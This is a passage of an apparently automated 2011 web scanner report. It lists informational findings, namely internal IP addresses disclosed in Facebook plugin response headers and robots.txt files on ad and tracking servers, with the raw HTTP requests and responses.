User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.60.34
X-Cnection: close
Date: Mon, 09 May 2011 15:35:06 GMT
Content-Length: 6900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.23. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3c96bf9e8%26origin%3Dhttp%253A%252F%252Fwww.fox8live.com%252Ff1697eaaa4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2F%23!%2Fpages%2FWVUE-FOX-8-News%2F107322144609&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.114.51
X-Cnection: close
Date: Mon, 09 May 2011 15:38:01 GMT
Content-Length: 10159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.24. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.csmonitor.com%2FBusiness%2F2011%2F0509%2FGas-prices-start-to-head-down%3Fcmpid%3Dfacebook_like&layout=standard&show_faces=false&width=450&action=recommend&colorscheme=light&height=25 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.73.35
X-Cnection: close
Date: Mon, 09 May 2011 15:38:05 GMT
Content-Length: 9232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.25. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df19edaa63%26origin%3Dhttp%253A%252F%252Fwww.fox8live.com%252Ff13543b984%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2F%23!%2Fpages%2FWVUE-FOX-8-News%2F107322144609&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.49.40
X-Cnection: close
Date: Mon, 09 May 2011 15:39:01 GMT
Content-Length: 9982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.26. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df690cc8cc%26origin%3Dhttp%253A%252F%252Fwww.fox8live.com%252Ffdf0b3de8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2F%23!%2Fpages%2FWVUE-FOX-8-News%2F107322144609&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/rss/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.126.61
X-Cnection: close
Date: Mon, 09 May 2011 15:39:07 GMT
Content-Length: 9990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.27. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A//www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm%2Fpage%2Fto%2Flike&layout=button_count&show_faces=false&width=125&action=recommend&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.35.40
X-Cnection: close
Date: Mon, 09 May 2011 15:36:48 GMT
Content-Length: 7034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.28. http://www.facebook.com/plugins/recommendations.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/recommendations.php?site=www.csmonitor.com&width=270&height=590&header=false&colorscheme=light&font=arial&border_color=%23fff HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.25.50
X-Cnection: close
Date: Mon, 09 May 2011 15:35:07 GMT
Content-Length: 19190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.29. http://www.facebook.com/plugins/recommendations.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/recommendations.php?site=www.csmonitor.com&width=270&height=590&header=false&colorscheme=light&font=arial&border_color=%23fff HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.82.36
X-Cnection: close
Date: Mon, 09 May 2011 15:38:08 GMT
Content-Length: 19230

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.30. http://www.facebook.com/plugins/recommendations.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/recommendations.php?site=www.csmonitor.com&width=270&height=590&header=false&colorscheme=light&font=arial&border_color=%23fff HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.83.47
X-Cnection: close
Date: Mon, 09 May 2011 15:36:10 GMT
Content-Length: 19190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

22. Robots.txt file  previous  next
There are 63 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


22.1. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:20 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 19 Mar 2009 21:31:08 GMT
ETag: "b044005-1a-4657f84ac9f00"
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=172800
Expires: Wed, 11 May 2011 15:35:20 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

22.2. http://ad.doubleclick.net/pfadx/csmonitor_cim/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/csmonitor_cim/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Mon, 09 May 2011 15:35:02 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

22.3. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 26 Oct 2010 14:01:22 GMT
Accept-Ranges: bytes
ETag: "43bb7d451675cb1:12dc"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Mon, 09 May 2011 15:35:09 GMT
Connection: close

User-agent: *
Disallow: /

22.4. http://amch.questionmarket.com/adscgen/sta.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: amch.questionmarket.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:40:02 GMT
Server: Apache/2.2.3
Last-Modified: Tue, 28 Mar 2006 15:45:05 GMT
ETag: "e0610677-1a-4100ff999c240"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=5, max=842
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /

22.5. http://api.twitter.com/1/wvuefox8/lists/wvue-fox-8-3/statuses.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /1/wvuefox8/lists/wvue-fox-8-3/statuses.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:42 GMT
Server: Apache
Vary: Host,Accept-Encoding
Set-Cookie: k=173.193.214.243.1304955582523786; path=/; expires=Mon, 16-May-11 15:39:42 GMT; domain=.twitter.com
Last-Modified: Wed, 04 May 2011 17:32:26 GMT
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=86400
Expires: Tue, 10 May 2011 15:39:42 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

22.6. http://assets1.grouponcdn.com/stylesheets/app/subscriptions/subscribe_2s208.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://assets1.grouponcdn.com
Path:   /stylesheets/app/subscriptions/subscribe_2s208.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: assets1.grouponcdn.com

Response

HTTP/1.0 200 OK
Server: nginx/0.7.65
Content-Type: text/plain
Accept-Ranges: bytes
Age: 90034
Date: Mon, 09 May 2011 15:35:37 GMT
Last-Modified: Thu, 18 Nov 2010 03:41:54 GMT
Content-Length: 25
Connection: close

User-agent: *
Disallow: /

22.7. http://at.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /ads/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: at.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:46 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 19 Mar 2009 21:31:08 GMT
ETag: "b044005-1a-4657f84ac9f00"
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=172800
Expires: Wed, 11 May 2011 15:35:46 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

22.8. http://atd.agencytradingdesk.net/WatsonTracker/IMP/A1000138/C1000187/P1003017/pixel.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atd.agencytradingdesk.net
Path:   /WatsonTracker/IMP/A1000138/C1000187/P1003017/pixel.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: atd.agencytradingdesk.net

Response

HTTP/1.1 200 OK
Content-Length: 135
Content-Type: text/plain
Last-Modified: Wed, 07 Feb 2007 15:35:46 GMT
Accept-Ranges: bytes
ETag: "18b4e0a2cd4ac71:64e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:51 GMT
Connection: keep-alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

User-agent: *
Allow: /Corporate/
Disallow: /TagPublish/
Disallow: /xt2/
Disallow: /rt1/
Disallow: /CWClick/
Disallow: /ContextAd/

22.9. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Tue, 10 May 2011 15:34:58 GMT
Date: Mon, 09 May 2011 15:34:58 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

22.10. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Tue, 10 May 2011 15:35:23 GMT
Date: Mon, 09 May 2011 15:35:23 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

22.11. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b3.mookie1.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:57 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 17 Jun 2010 13:44:25 GMT
ETag: "1ff0232-1a-4893a095c6040"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660;path=/;httponly

User-agent: *
Disallow: /

22.12. http://bidder.mathtag.com/iframe/notify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bidder.mathtag.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:17 GMT
Server: MMBD/3.5.5
Content-Type: text/plain
Content-Length: 25
x-mm-host: ewr-bidder-x6
Connection: close

User-agent: *
Disallow: /

22.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 20:19:44 GMT
Accept-Ranges: bytes
ETag: "0b02b30da1ac61:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 09 May 2011 15:38:52 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

22.14. http://cache-01.cleanprint.net/cp/psj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cache-01.cleanprint.net
Path:   /cp/psj

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cache-01.cleanprint.net

Response

HTTP/1.0 200 OK
Server: None
ETag: "2e-4767523e05c00"
Accept-Ranges: bytes
X-Server: FD-03
Vary: Accept-Encoding
Content-Type: text/plain
Content-Language: en
Age: 62905
Date: Mon, 09 May 2011 15:37:23 GMT
Last-Modified: Wed, 21 Oct 2009 17:16:32 GMT
Content-Length: 46
Connection: close

# Deny all robots
User-agent: *
Disallow: /


22.15. http://content.usatoday.com/apps/insidepage/crc.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /apps/insidepage/crc.ashx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 24 Sep 2010 18:31:30 GMT
Accept-Ranges: bytes
ETag: "0eda5b4165ccb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:38:09 GMT
Connection: close
Content-Length: 1660

# robots.txt for http://www.usatoday.com
sitemap: http://www.usatoday.com/USAToday_sitemap.xml
User-agent:*
Disallow:/feedback
Disallow:/HTML
Disallow:/html
Disallow:/cgi-bin
Disallow:/system

...[SNIP]...

22.16. http://contextweb.usatoday.net/asp/Context/ContextWebHandler.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://contextweb.usatoday.net
Path:   /asp/Context/ContextWebHandler.ashx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: contextweb.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Fri, 24 Sep 2010 18:31:30 GMT
Accept-Ranges: bytes
ETag: "0eda5b4165ccb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 1660
Date: Mon, 09 May 2011 15:36:35 GMT
Connection: close

# robots.txt for http://www.usatoday.com
sitemap: http://www.usatoday.com/USAToday_sitemap.xml
User-agent:*
Disallow:/feedback
Disallow:/HTML
Disallow:/html
Disallow:/cgi-bin
Disallow:/system

...[SNIP]...

22.17. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fm.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
